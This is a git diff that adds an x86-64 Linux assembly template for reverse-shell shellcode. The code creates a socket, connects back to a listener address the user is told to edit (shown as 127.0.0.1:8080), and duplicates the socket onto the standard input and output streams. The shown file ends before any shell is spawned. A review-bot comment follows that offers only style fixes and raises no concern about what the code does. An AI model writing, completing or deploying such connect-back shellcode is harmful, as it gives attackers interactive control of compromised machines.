path: root/templates/shellcode/examples/tcp64.asm
Diffstat (limited to 'templates/shellcode/examples/tcp64.asm')
-rw-r--r--templates/shellcode/examples/tcp64.asm49
1 files changed, 49 insertions, 0 deletions
diff --git a/templates/shellcode/examples/tcp64.asm b/templates/shellcode/examples/tcp64.asm
new file mode 100644
index 0000000..1ec3bc8
--- /dev/null
+++ b/templates/shellcode/examples/tcp64.asm
@@ -0,0 +1,49 @@
+; Based loosely on https://systemoverlord.com/2018/10/30/understanding-shellcode-the-reverse-shell.html
+
+; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
+xor rax, rax
+xor rdi, rdi
+xor rsi, rsi
+xor rdx, rdx
+mov al, 41
+mov dil, 2
+mov sil, 1
+syscall
+
+; !! Edit this section to connect back to your listener !!
+;
+; struct sockaddr_in { // Struct size: 16
+; short int sin_family; // AF_INET (2)
+; unsigned short int sin_port; // Set to 8080 below
+; struct in_addr sin_addr; // Set to 127.0.0.1 below
+; unsigned char sin_zero[8];
+; };
+;
+; struct in_addr { // Struct size: 4
+; uint32_t s_addr;
+; };
+xor rbx, rbx
+push rbx
+mov rbx, 0x0100007f901f0002
+push rbx
+
+; connect(fd, sockaddr, sizeof sockaddr)
+mov rdi, rax
+mov rsi, rsp
+mov dl, 16
+xor rax, rax
+mov al, 42
+syscall
+
+; dup2(fd, stdin)
+; dup2(fd, stdout)
+; dup2(fd, stderr)
+xor rsi, rsi
+mov al, 33
+syscall
+mov sil, 1
+mov al, 33
+syscall
+mov sil, 2
+mov al, 33
+syscall
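Review bot: The new file never states its assembler syntax, target or ABI, so a reader has to infer from `mov al, 41` and the `syscall` mnemonic that this is Intel-syntax x86-64 for Linux with raw syscall numbers; a one-line header after the attribution comment such as `; Intel syntax (NASM), x86-64 Linux, raw syscalls; no section/global directives because this is a template fragment` would make that explicit. The syscall numbers 41, 42 and 33 at `mov al, 41`, `mov al, 42` and the three `mov al, 33` lines are likewise bare magic numbers; the file's own comments already name the calls, so naming the constants (`SYS_SOCKET equ 41` and so on) or at least putting the name in the end-of-line comment would keep the code and its comments from drifting apart. The file ends at the third dup2 with no terminating instruction, which is presumably intentional for a fragment the surrounding template completes — worth saying so in the header.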